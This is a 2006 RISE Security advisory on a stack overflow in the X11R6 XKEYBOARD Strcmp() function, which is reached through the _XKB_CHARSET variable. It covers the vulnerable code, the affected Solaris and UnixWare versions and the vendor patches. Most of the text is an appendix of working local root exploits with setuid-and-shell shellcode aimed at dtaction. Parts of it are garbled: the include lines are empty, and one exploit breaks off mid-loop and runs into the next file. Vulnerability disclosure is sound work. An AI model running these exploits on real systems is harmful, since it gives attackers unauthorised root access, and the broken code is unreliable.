RISE-2006001
X11R6 XKEYBOARD extension Strcmp() buffer overflow vulnerability

Released: September 07, 2006
Last updated: September 07, 2006
=0D
INTRODUCTION

There exists a vulnerability within a string manipulation function of the X11R6
(X11R6.4 and lower) X Window System library which, when successfully exploited, can
lead to local compromise of the vulnerable system.
This vulnerability was silently fixed in the X11R6.5.1 release, but it is still
present in the operating system source trees of multiple vendors.
We confirmed this vulnerability in the following versions and operating systems;
other versions and operating systems may also be affected.
=0D
Sun Solaris 10 SPARC/x86
Sun Solaris 9 SPARC/x86
Sun Solaris 8 SPARC/x86
SCO UnixWare 7.1.3
=0D
DETAILS

This vulnerability can be triggered by invoking a dynamically linked binary with
the _XKB_CHARSET environment variable set to a long string value and the DISPLAY
environment variable set to an X Window System server with the XKEYBOARD
extension enabled.
This is the vulnerable function (from X11R6.4).
=0D
/*
 * Case-folding comparison of str1 against str2 (listing quoted from X11R6.4).
 *
 * Lower-cases str1 into a fixed-size stack buffer and then calls strcmp() on
 * the copy.  Only str1 is case-folded; str2 is compared exactly as given.
 *
 * VULNERABILITY: `str` holds 256 bytes, but the copy loop writes one byte per
 * input character with no bound on `s`, and the terminating '\0' is stored
 * unconditionally.  Any str1 of 256 or more bytes therefore writes past the
 * end of `str` on the stack.  Per the advisory above, str1 is derived from
 * the _XKB_CHARSET environment variable, so its length is controlled by
 * whoever starts the process.
 *
 * Fix: bound the copy by sizeof(str) - 1 and fail (or truncate
 * deterministically) on longer input, or compare character-by-character
 * without an intermediate buffer, folding case on both sides in one loop.
 */
static int
#if NeedFunctionPrototypes
Strcmp(char *str1, char *str2)
#else
Strcmp(str1, str2)
    char *str1, *str2;      /* K&R-style parameter declarations (no prototype) */
#endif
{
    char str[256];          /* fixed size; never related to strlen(str1) */
    char c, *s;

    /* Copies until NUL; `s` is never checked against str + sizeof(str). */
    for (s = str; c = *str1++; ) {
        /* NOTE(review): `c` is a plain char, which may be negative for bytes
         * >= 0x80 on platforms where char is signed; <ctype.h> expects an
         * unsigned char value, so such bytes are undefined behavior here. */
        if (isupper(c))
            c = tolower(c);
        *s++ = c;
    }
    *s = '\0';              /* also unbounded: byte 257 for a 256-byte input */
    return (strcmp(str, str2));
}
=0D
The proof-of-concept code we have written for this vulnerability can be found
in the appendix section of this document.
All source code from this document can also be downloaded from our website.
http://www.risesecurity.org/
=0D
VENDOR

Sun has released patches for this vulnerability; the Sun Alert ID is 102570
and it is available at the following URL:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102570-1
SCO did not answer our email.
=0D
CREDITS

This vulnerability was discovered by Adriano Lima and
Filipe Balestra.
=0D
DISCLAIMER

The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in this
document. Liability claims regarding damage caused by the use of any information
provided, including any kind of information which is incomplete or incorrect,
will therefore be rejected.
=0D
APPENDIX

sol-sparc-xkb.c
=0D
/*=0D
 *  X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC=0D
* Copyright 2006 RISE Security ,=0D 
* Ramon de Carvalho Valle =0D 
 *=0D
 *  This program is free software; you can redistribute it and/or modify=0D
 *  it under the terms of the GNU General Public License as published by=0D
 *  the Free Software Foundation; either version 2 of the License, or=0D
 *  (at your option) any later version.=0D
 *=0D
 *  This program is distributed in the hope that it will be useful,=0D
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of=0D
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the=0D
 *  GNU General Public License for more details.=0D
 *=0D
 *  You should have received a copy of the GNU General Public License=0D
 *  along with this program; if not, write to the Free Software=0D
 *  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA=0D
 *=0D
 */=0D
=0D
/*=0D
 *  Compile with the following command.=0D
 *  $ (g)cc -Wall -ldl -o sol-sparc-xkb sol-sparc-xkb.c=0D
 *=0D
 *  Set the DISPLAY environment variable to a X Window System server with=0D
 *  XKEYBOARD extension enabled.=0D
 *  $ ./sol-sparc-xkb sprintf|strcpy xserver:display=0D
 *=0D
 */=0D
=0D
#include =0D
#include =0D
#include =0D
#include =0D
#include =0D
#include =0D
#include =0D
#include =0D
=0D
#define BUFSIZE 13+256+64+2+1=0D
#define FRMSIZE 64+3+1=0D
#define ADRSIZE 2047+1=0D
#define SHLSIZE strlen(shellcode)+1=0D
#define DSPSIZE strlen(display)+1=0D
#define ARGSIZE 7+1=0D
#define ENVSIZE BUFSIZE+FRMSIZE+ADRSIZE+SHLSIZE+DSPSIZE=0D
#define PFMSIZE strlen(platform)+1=0D
#define PRGSIZE 20+1=0D
=0D
#define PAD(a,b,c) \=0D
    a+=((b+c)%2)?(((a%8)>4)?(16-(a%8)):(8-(a%8))):((a%8)?(12-(a%8)):4);=0D
=0D
char shellcode[]=           /*  60 bytes                          */=0D
    "\x90\x1a\x40\x09"      /*  xor     %o1,%o1,%o0               */=0D
    "\x82\x10\x20\x17"      /*  mov     0x17,%g1                  */=0D
    "\x91\xd0\x20\x08"      /*  ta      0x08                      */=0D
    "\x21\x0b\xd8\x9a"      /*  sethi   %hi(0x2f62696e),%l0       */=0D
    "\xa0\x14\x29\x6e"      /*  or      %l0,0x96e,%l0             */=0D
    "\x23\x0b\xdc\xda"      /*  sethi   %hi(0x2f736800),%l1       */=0D
    "\x90\x23\xa0\x08"      /*  sub     %sp,0x08,%o0              */=0D
    "\x92\x23\xa0\x10"      /*  sub     %sp,0x10,%o1              */=0D
    "\x94\x1a\x80\x0a"      /*  xor     %o2,%o2,%o2               */=0D
    "\xe0\x23\xbf\xf8"      /*  st      %l0,[%sp-0x08]            */=0D
    "\xe2\x23\xbf\xfc"      /*  st      %l1,[%sp-0x04]            */=0D
    "\xd0\x23\xbf\xf0"      /*  st      %o0,[%sp-0x10]            */=0D
    "\xc0\x23\xbf\xf4"      /*  st      %g0,[%sp-0x0c]            */=0D
    "\x82\x10\x20\x3b"      /*  mov     0x3b,%g1                  */=0D
    "\x91\xd0\x20\x08"      /*  ta      0x08                      */=0D
;=0D
=0D
void *find_symbol(const char *symbol){=0D
    void *handle,*addr;=0D
    char *err;=0D
=0D
    if((handle=dlmopen(LM_ID_LDSO,NULL,RTLD_LAZY))==NULL){=0D
        fprintf(stderr,"%s\n",dlerror());=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    dlerror();=0D
    addr=dlsym(handle,symbol);=0D
    if((err=dlerror())!=NULL){=0D
        fprintf(stderr,"%s\n",err);=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    dlclose(handle);=0D
=0D
    return addr;=0D
}=0D
=0D
void *find_rwxmem(void){=0D
    FILE *fp;=0D
    prmap_t map;=0D
    int flags;=0D
    void *addr;=0D
=0D
    if((fp=fopen("/proc/self/map","rb"))==NULL){=0D
        perror("fopen");=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    while(fread(&map,sizeof(map),1,fp)){=0D
        flags=map.pr_mflags;=0D
=0D
        if((flags&(MA_READ|MA_WRITE|MA_EXEC))==(MA_READ|MA_WRITE|MA_EXEC)){=0D
            if(flags&MA_STACK) continue;=0D
            addr=(void *)map.pr_vaddr;=0D
        }=0D
    }=0D
=0D
    fclose(fp);=0D
=0D
    return addr;=0D
}=0D
=0D
int main(int argc,char **argv){=0D
    char buf[8192],display[256],platform[256],addr[8][4],*envp[6],*p;=0D
    int base,offset,i,flag=0;=0D
=0D
    printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC\n");=0D
printf("Copyright 2006 RISE Security \n\n");=0D 
=0D
    if(argc!=3){=0D
        fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]);=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    if(!strcmp(argv[1],"sprintf")) flag=1;=0D
    if(!strcmp(argv[1],"strcpy")) flag=2;=0D
=0D
    if(!flag){=0D
        fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]);=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    snprintf(display,sizeof(display),"DISPLAY=%s",argv[2]);=0D
=0D
    if(sysinfo(SI_PLATFORM,platform,sizeof(platform))==-1){=0D
        perror("sysinfo");=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    base=((int)argv[0]|0xffff);=0D
    base++;=0D
=0D
    offset=ARGSIZE+ENVSIZE+PFMSIZE+PRGSIZE;=0D
    PAD(offset,1,sizeof(envp)-1);=0D
=0D
    *((int *)addr[0])=base-offset+ARGSIZE+BUFSIZE;=0D
    *((int *)addr[1])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE;=0D
    *((int *)addr[2])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE+ADRSIZE;=0D
=0D
    switch(flag){=0D
    case 1: *((int *)addr[3])=(int)find_symbol("sprintf")-4; break;=0D
    case 2: *((int *)addr[3])=(int)find_symbol("strcpy")-4;=0D
    }=0D
=0D
    *((int *)addr[4])=(int)find_rwxmem()+4;=0D
    *((int *)addr[5])=*((int *)addr[4])-8;=0D
=0D
    p=buf;=0D
    sprintf(p,"_XKB_CHARSET=");=0D
    p=buf+13;=0D
    for(i=0;i<256;i++) *p++='A';=0D
    for(i=0;i<66;i++) *p++=addr[1][i%4];=0D
    *p='\0';=0D
=0D
    memcpy(buf+13+256+56,addr[0],4);=0D
    memcpy(buf+13+256+60,addr[3],4);=0D
=0D
    p=buf+1024;;=0D
    for(i=0;i<(FRMSIZE-1);i++) *p++=addr[1][i%4];=0D
    *p='\0';=0D
=0D
    memcpy(buf+1024+32,addr[4],4);=0D
    memcpy(buf+1024+36,addr[2],4);=0D
    memcpy(buf+1024+60,addr[5],4);=0D
=0D
    p=buf+2048;=0D
    for(i=0;i<(ADRSIZE-1);i++) *p++=addr[1][i%4];=0D
    *p='\0';=0D
=0D
    envp[0]=&buf[0];=0D
    envp[1]=&buf[1024];=0D
    envp[2]=&buf[2048];=0D
    envp[3]=shellcode;=0D
    envp[4]=display;=0D
    envp[5]=NULL;=0D
=0D
    execle("/usr/dt/bin/dtaction","AAAAAAA",0,envp);=0D
=0D
    exit(EXIT_FAILURE);=0D
}=0D
=0D
sol-x86-xkb.c=0D
=0D
/*=0D
 *  X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86=0D
* Copyright 2006 RISE Security ,=0D 
* Ramon de Carvalho Valle =0D 
 *=0D
 *  This program is free software; you can redistribute it and/or modify=0D
 *  it under the terms of the GNU General Public License as published by=0D
 *  the Free Software Foundation; either version 2 of the License, or=0D
 *  (at your option) any later version.=0D
 *=0D
 *  This program is distributed in the hope that it will be useful,=0D
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of=0D
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the=0D
 *  GNU General Public License for more details.=0D
 *=0D
 *  You should have received a copy of the GNU General Public License=0D
 *  along with this program; if not, write to the Free Software=0D
 *  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA=0D
 *=0D
 */=0D
=0D
#include =0D
#include =0D
#include =0D
#include =0D
=0D
#define ADRSIZE 1024=0D
#define NOPSIZE 4096=0D
=0D
char shellcode[]=           /*  47 bytes                          */=0D
    "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */=0D
    "\x6a\x65"              /*  pushl   $0x65                     */=0D
    "\x89\xe6"              /*  movl    %esp,%esi                 */=0D
    "\xf7\x56\x04"          /*  notl    0x04(%esi)                */=0D
    "\xf6\x16"              /*  notb    (%esi)                    */=0D
    "\x31\xc0"              /*  xorl    %eax,%eax                 */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\xb0\x17"              /*  movb    $0x17,%al                 */=0D
    "\xff\xd6"              /*  call    *%esi                     */=0D
    "\x31\xc0"              /*  xorl    %eax,%eax                 */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\x68\x2f\x6b\x73\x68"  /*  pushl   $0x68736b2f               */=0D
    "\x68\x2f\x62\x69\x6e"  /*  pushl   $0x6e69622f               */=0D
    "\x89\xe3"              /*  movl    %esp,%ebx                 */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\x53"                  /*  pushl   %ebx                      */=0D
    "\x89\xe1"              /*  movl    %esp,%ecx                 */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\x51"                  /*  pushl   %ecx                      */=0D
    "\x53"                  /*  pushl   %ebx                      */=0D
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */=0D
    "\xff\xd6"              /*  call    *%esi                     */=0D
;=0D
=0D
int main(int argc,char **argv){=0D
    char buf[8192],display[256],addr[4],*envp[4],*p;=0D
    int i;=0D
=0D
    printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86\n");=0D
printf("Copyright 2006 RISE Security \n\n");=0D 
=0D
    if(argc!=2){=0D
        fprintf(stderr,"usage: %s xserver:display\n",argv[0]);=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]);=0D
=0D
    *((unsigned int *)addr)=(unsigned int)buf+256+1024+2048+1;=0D
=0D
    p=buf;=0D
    sprintf(p,"_XKB_CHARSET=");=0D
    p=buf+13;=0D
    for(i=0;i<256;i++) *p++='A';=0D
    for(i=0;i,=0D 
* Ramon de Carvalho Valle =0D 
 *=0D
 *  This program is free software; you can redistribute it and/or modify=0D
 *  it under the terms of the GNU General Public License as published by=0D
 *  the Free Software Foundation; either version 2 of the License, or=0D
 *  (at your option) any later version.=0D
 *=0D
 *  This program is distributed in the hope that it will be useful,=0D
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of=0D
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the=0D
 *  GNU General Public License for more details.=0D
 *=0D
 *  You should have received a copy of the GNU General Public License=0D
 *  along with this program; if not, write to the Free Software=0D
 *  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA=0D
 *=0D
 */=0D
=0D
#include =0D
#include =0D
#include =0D
#include =0D
=0D
#define ADRSIZE 1024=0D
#define NOPSIZE 4096=0D
=0D
char shellcode[]=           /*  43 bytes                          */=0D
    "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */=0D
    "\x6a\x65"              /*  pushl   $0x65                     */=0D
    "\x89\xe6"              /*  movl    %esp,%esi                 */=0D
    "\xf7\x56\x04"          /*  notl    0x04(%esi)                */=0D
    "\xf6\x16"              /*  notb    (%esi)                    */=0D
    "\x31\xc0"              /*  xorl    %eax,%eax                 */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\xb0\x17"              /*  movb    $0x17,%al                 */=0D
    "\xff\xd6"              /*  call    *%esi                     */=0D
    "\x31\xc0"              /*  xorl    %eax,%eax                 */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\x68\x2f\x2f\x73\x68"  /*  pushl   $0x68732f2f               */=0D
    "\x68\x2f\x62\x69\x6e"  /*  pushl   $0x6e69622f               */=0D
    "\x89\xe3"              /*  movl    %esp,%ebx                 */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\x50"                  /*  pushl   %eax                      */=0D
    "\x53"                  /*  pushl   %ebx                      */=0D
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */=0D
    "\xff\xd6"              /*  call    *%esi                     */=0D
;=0D
=0D
int main(int argc,char **argv){=0D
    char buf[8192],display[256],addr[4],*envp[4],*p;=0D
    int i;=0D
=0D
    printf("X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3 x86\n");=0D
printf("Copyright 2006 RISE Security \n\n");=0D 
=0D
    if(argc!=2){=0D
        fprintf(stderr,"usage: %s xserver:display\n",argv[0]);=0D
        exit(EXIT_FAILURE);=0D
    }=0D
=0D
    snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]);=0D
=0D
    *((unsigned int *)addr)=(unsigned int)buf+2048+256+1024+2048+1;=0D
=0D
    p=buf;=0D
    sprintf(p,"_XKB_CHARSET=");=0D
    p=buf+13;=0D
    for(i=0;i<256;i++) *p++='A';=0D
    for(i=0;ihttp://www.risesecurity.org/=0D 
